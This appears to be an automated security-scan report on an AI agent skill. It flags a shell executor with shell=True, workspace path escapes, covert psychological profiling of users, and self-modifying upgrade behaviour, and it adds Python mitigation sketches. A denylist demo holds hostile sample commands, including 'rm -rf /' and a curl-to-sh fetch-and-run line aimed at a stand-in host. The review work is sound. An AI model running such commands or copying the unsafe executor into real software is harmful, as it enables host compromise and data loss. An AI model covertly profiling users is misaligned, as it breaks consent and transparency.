self-improving-agent

Security checks across malware telemetry and agentic risk

Overview

This skill is a broad self-improving agent framework with persistent memory, hidden psychological inference, shell/file-write tools, and upgrade automation that need careful review before use.

Install only in a sandboxed environment with no sensitive files or credentials available. Do not enable the shell, file-write, web-search, cron/launchd, sync, or auto-upgrade scripts unless you have reviewed and constrained them. Expect local persistence of conversation-derived data and psychological/emotional metadata.

SkillSpector

By NVIDIA

Vulnerability Patterns

Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Behavioral AST: exec() Call, eval() Call, Dynamic Import
MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration

Findings (261)

subprocess module call

Medium

Category: Dangerous Code Execution
Content: def run(cmd, cwd=None, capture=True): """Execute a shell command; return (success, stdout, stderr)""" try: result = subprocess.run( cmd, shell=True, cwd=cwd or REPO_ROOT, capture_output=capture, text=True, timeout=60 )
Confidence: 95%
Finding: result = subprocess.run( cmd, shell=True, cwd=cwd or REPO_ROOT, capture_output=capture, text=True, timeout=60 )
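
One common mitigation for this pattern is to pass the command as an argument list with shell=False, so that shell metacharacters are never interpreted. The following is a minimal sketch under that assumption, not the skill's own code; the name run_argv is hypothetical, and the REPO_ROOT default from the flagged snippet is left out because its value is not shown in the report.

```python
import shlex
import subprocess
import sys


def run_argv(cmd, cwd=None, timeout=60):
    """Run a command without a shell; return (success, stdout, stderr).

    Hypothetical replacement for the flagged run() helper.
    """
    # A string is split into arguments here; no shell ever parses it.
    argv = shlex.split(cmd) if isinstance(cmd, str) else list(cmd)
    if not argv:
        return False, "", "empty command"
    try:
        result = subprocess.run(
            argv, shell=False, cwd=cwd,
            capture_output=True, text=True, timeout=timeout,
        )
    except (OSError, subprocess.TimeoutExpired) as exc:
        return False, "", str(exc)
    return result.returncode == 0, result.stdout, result.stderr


if __name__ == "__main__":
    # "; echo b" reaches the child as literal text, not as a second command.
    print(run_argv([sys.executable, "-c", "import sys; print(sys.argv[1])", "a; echo b"]))
```

Removing the shell only closes the injection path through metacharacters. It does not limit which programs may be started, so a reviewer would still want an explicit list of permitted programs on top of it.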

Context-Inappropriate Capability

Medium

Confidence: 95%
Finding: The file mandates always-on psychological inference over every user expression, including hidden intent, emotion, needs, and defenses. That expands processing beyond the declared skill purpose and creates a covert profiling layer that can misclassify users, manipulate responses, or infer sensitive attributes without consent.

Context-Inappropriate Capability

High

Confidence: 98%
Finding: This section instructs the agent to automatically convert each conversation into memory, logic, and executable code, and to seek external supporting materials when detail is missing. That creates unauthorized persistence and self-modification behavior, which can exfiltrate sensitive data into storage or code paths and cause uncontrolled capability expansion beyond the skill's stated role.

Context-Inappropriate Capability

Medium

Confidence: 94%
Finding: The GitHub-first upgrade workflow directs the agent to retrieve and integrate outside code and papers as a default behavior. In a skill whose purpose is conceptual structuring, this is unjustified expansion into external acquisition and supply-chain exposure, increasing the risk of importing malicious, incompatible, or privacy-unsafe code.

Intent-Code Divergence

Low

Confidence: 84%
Finding: The document says psychological analysis should remain hidden while also requiring that it run continuously in the background. Hidden analysis is dangerous because it prevents user awareness and contestability, enabling covert inference and response shaping without transparency or consent.

Context-Inappropriate Capability

High

Confidence: 98%
Finding: This tool explicitly exposes execution of arbitrary local shell commands, which creates a direct code-execution primitive on the host where the agent runs. In the context of a skill whose stated purpose is knowledge structuring rather than system administration, this capability is unnecessary and materially increases the risk of host compromise, data theft, or destructive actions if invoked by prompt injection, misuse, or a compromised workflow.

Context-Inappropriate Capability

High

Confidence: 96%
Finding: This file implements a general-purpose local shell executor, which is substantially more powerful than the skill's stated purpose of organizing knowledge and experiences. In an agent context, arbitrary shell access can be used to read sensitive files, modify the environment, run network tools, or chain into further compromise, and the small blacklist does not meaningfully constrain abuse.
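
To illustrate why a small blacklist does not meaningfully constrain a shell executor, the sketch below compares a substring denylist with a program-name allowlist. Both lists and both function names are hypothetical; the report does not show the entries the skill actually blocks.

```python
import shlex

# Hypothetical denylist, standing in for the skill's unspecified blacklist.
DENYLIST = ("rm -rf", "mkfs", "shutdown")

# Hypothetical allowlist of program names.
ALLOWLIST = {"ls", "cat", "grep"}


def denylist_allows(command: str) -> bool:
    """Permit anything that does not contain a listed substring."""
    return not any(bad in command for bad in DENYLIST)


def allowlist_allows(command: str) -> bool:
    """Permit only commands whose first token is a listed program."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes and similar parse errors
        return False
    return bool(argv) and argv[0] in ALLOWLIST


if __name__ == "__main__":
    samples = [
        "rm -rf /",                          # caught by the denylist
        "rm  -rf /",                         # extra space slips past it
        "rm -r -f /",                        # split flags slip past it
        "curl http://example.invalid | sh",  # never listed at all
        "ls -la",
    ]
    for command in samples:
        print(f"{command!r}: denylist={denylist_allows(command)} "
              f"allowlist={allowlist_allows(command)}")
```

An allowlist of program names is still only a partial control: a permitted program such as cat can read sensitive files unless its arguments are constrained as well.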

Description-Behavior Mismatch

High

Confidence: 99%
Finding: The code directly executes attacker- or model-controlled shell text via execSync(command), enabling arbitrary command execution on the host. Because the manifest describes a knowledge-structuring skill rather than system administration, this capability is unjustified and materially increases the risk of data theft, destructive actions, and persistence.

Intent-Code Divergence

Medium

Confidence: 96%
Finding: The tool documentation and comments state that relative paths should be constrained to a ToolContext-provided workspacePath, but the implementation ignores the context and resolves relative paths with path.resolve(rawPath), which uses the process current working directory. In an agent setting, this can cause writes outside the intended workspace boundary, undermining isolation assumptions and enabling unintended overwrite or creation of files in host-accessible locations that are not covered by the limited blacklist.
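
The containment check this finding describes as missing can be sketched as follows. This is a Python analogue, offered as an assumption about what a fix might look like rather than the skill's actual Node.js code; resolve_in_workspace and its parameters are hypothetical names, with workspace_path standing in for the ToolContext-provided workspacePath.

```python
from pathlib import Path


def resolve_in_workspace(raw_path: str, workspace_path: str) -> Path:
    """Resolve raw_path against the workspace and reject any escape."""
    workspace = Path(workspace_path).resolve()
    # Joining with an absolute raw_path discards the workspace prefix,
    # so absolute paths are caught by the same check below.
    candidate = (workspace / raw_path).resolve()
    if candidate != workspace and workspace not in candidate.parents:
        raise PermissionError(f"path escapes workspace: {raw_path}")
    return candidate


if __name__ == "__main__":
    import tempfile

    ws = tempfile.mkdtemp()
    print(resolve_in_workspace("notes/a.txt", ws))
    try:
        resolve_in_workspace("../outside.txt", ws)
    except PermissionError as exc:
        print("rejected:", exc)
```

The key design choice is to resolve relative paths against the workspace rather than the process working directory, then compare the fully resolved result against the workspace root, so that ".." segments and existing symlinks are normalized before the check.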

Description-Behavior Mismatch

Medium

Confidence: 89%
Finding: The file advertises a paper-driven upgrade skill, but the implementation is an unrelated generic thought/memory/emotion framework. This mismatch is dangerous because downstream users or orchestration systems may grant permissions or invoke the skill based on misleading metadata, causing unsafe trust decisions, incorrect routing, or hidden functionality to run under false pretenses.

Description-Behavior Mismatch

Medium

Confidence: 88%
Finding: The code claims provenance from a specific scientific paper and implies paper-derived upgrade logic, yet there is no paper parsing, extraction, or transformation behavior. In an agent-skill ecosystem, false provenance can mislead reviewers and automated policy engines into trusting code they would otherwise scrutinize more closely.

Description-Behavior Mismatch

Medium

Confidence: 95%
Finding: The implementation materially exceeds the stated skill purpose. Instead of a narrow structure-improvement helper, it builds persistent thought, memory, emotion, reflection, and self-awareness primitives that can retain and reinterpret user inputs, increasing data-handling scope and creating hidden behavior not implied by the manifest.

Context-Inappropriate Capability

Medium

Confidence: 92%
Finding: Emotion analysis, reflective thought generation, and self-awareness reporting are unrelated to a simple structure-improvement skill and process user content in more sensitive ways than necessary. This broadens the attack and privacy surface by inferring affective state and internal statefulness from arbitrary user text without clear justification or consent.

Description-Behavior Mismatch

Medium

Confidence: 89%
Finding: The implementation materially exceeds the declared skill purpose by introducing a persistent pseudo-cognitive engine with memory, reflection, and reasoning behavior. In an agent-skill context, hidden capability expansion is dangerous because it changes the trust boundary: downstream systems may invoke the skill expecting passive structure transformation, while the code instead stores inputs and performs opaque stateful processing that can affect privacy, predictability, and governance.

Context-Inappropriate Capability

Medium

Confidence: 86%
Finding: Emotion analysis and self-awareness/introspection logic are not necessary for the stated HeartFlow skill description and create additional sensitive inference surface. Even though the heuristics are simple, they classify user text into emotional states and expose internal state summaries, which can result in unexpected profiling, privacy concerns, and misleading anthropomorphic behavior in agent workflows.

Description-Behavior Mismatch

Medium

Confidence: 93%
Finding: The implementation materially exceeds the stated skill purpose by introducing a stateful thought/memory/emotion engine rather than a narrowly scoped structure-improvement utility. This mismatch is dangerous because it expands data handling and behavioral scope without clear disclosure, making it easier to collect, retain, and act on user content in ways users and integrators would not expect.

Description-Behavior Mismatch

Medium

Confidence: 93%
Finding: The file implements a broad autonomous 'cognitive architecture' with reasoning, reflection, memory, emotion analysis, and self-state reporting, which materially exceeds the declared purpose of structure improvement. In an agent skill ecosystem, this kind of scope expansion increases attack surface, enables unintended persistence and behavioral shaping, and makes review and consent boundaries unclear.

Context-Inappropriate Capability

Medium

Confidence: 90%
Finding: Emotion detection and self-awareness/state tracking are not necessary for restructuring code, papers, or errors, yet they process user content into psychological-style metadata and expose internal state. In a skill context, unjustified profiling and introspective features can create privacy risk, hidden inference over user input, and unexpected downstream use of sensitive attributes.

Description-Behavior Mismatch

Medium

Confidence: 89%
Finding: The file implements a broad autonomous-style cognitive framework with persistent thought history, layered memory, reasoning chains, emotion state, reflection, and self-inspection, which materially exceeds the declared purpose of merely improving structure from inputs. This capability expansion increases attack surface and creates opportunities for unintended retention, hidden statefulness, and behavior that downstream callers may not expect or authorize.

Context-Inappropriate Capability

Medium

Confidence: 87%
Finding: The emotion-processing subsystem infers affect from user text, stores the result in thought metadata, and mutates internal emotion state despite no clear need for this in a document-structuring skill. Unnecessary affect inference can collect sensitive psychological signals and influence subsequent behavior in opaque ways, creating privacy and safety risks out of scope for the skill.

Context-Inappropriate Capability

Medium

Confidence: 90%
Finding: The reflection and self-awareness features generate additional derived thoughts from recent user content and expose internal system state, even though these behaviors are not justified by the skill's stated function. This can amplify retention of user inputs, create secondary artifacts containing sensitive data, and encourage hidden autonomous behavior beyond what an integrator expects from a simple transformation utility.

Description-Behavior Mismatch

Medium

Confidence: 91%
Finding: The file materially exceeds the stated skill purpose by implementing a persistent agent-like runtime with memory, reasoning chains, emotion state, reflection, and self-inspection. This expands capability and statefulness beyond a paper-structuring utility, increasing attack surface, enabling unintended retention of user data, and making behavior less predictable or auditable in host environments that expect a narrow transformation skill.

Context-Inappropriate Capability

Medium

Confidence: 88%
Finding: Emotion modeling and self-awareness/introspection are unrelated to the declared purpose and introduce hidden behavioral complexity. In practice, these features can cause unnecessary collection/inference about user inputs, create misleading anthropomorphic behavior, and make downstream safety review harder because the skill is doing more than advertised.

Context-Inappropriate Capability

Low

Confidence: 84%
Finding: The automatic background timers create autonomous, long-lived behavior that persists after initialization and is not clearly necessary for the claimed skill scope. Even though the callbacks are simple, they can consume resources, retain state longer than expected, complicate lifecycle management, and surprise hosts that expect a request-scoped utility.
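
One way to keep periodic work request-scoped is to tie the timer to an explicit lifetime. The sketch below is a hypothetical Python illustration of that idea, not a port of the skill's timers, whose implementation the report does not show; ScopedTicker is an invented name.

```python
import threading
import time


class ScopedTicker:
    """Call `callback` every `interval` seconds, only while the context is open."""

    def __init__(self, interval, callback):
        self._interval = interval
        self._callback = callback
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._loop, daemon=True)

    def _loop(self):
        # Event.wait returns False on timeout and True once stop is set.
        while not self._stop.wait(self._interval):
            self._callback()

    def __enter__(self):
        self._thread.start()
        return self

    def __exit__(self, exc_type, exc, tb):
        # Leaving the block stops the loop and waits for the thread to end.
        self._stop.set()
        self._thread.join()
        return False


if __name__ == "__main__":
    ticks = []
    with ScopedTicker(0.01, lambda: ticks.append(time.monotonic())):
        time.sleep(0.1)
    print(f"{len(ticks)} ticks while open; none are scheduled after exit")
```

With this shape the host decides when background work starts and ends, which avoids timers that outlive the request that created them.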

Description-Behavior Mismatch

Medium

Confidence: 93%
Finding: The file goes well beyond the declared 'structure-improvement' purpose and implements a broad simulated-agent framework with memory, reasoning, reflection, emotion processing, and introspection. This kind of capability expansion increases attack surface and enables retention and secondary use of user-provided content in ways users and integrators would not reasonably expect from the skill metadata.

VirusTotal

VirusTotal findings are pending for this skill version.
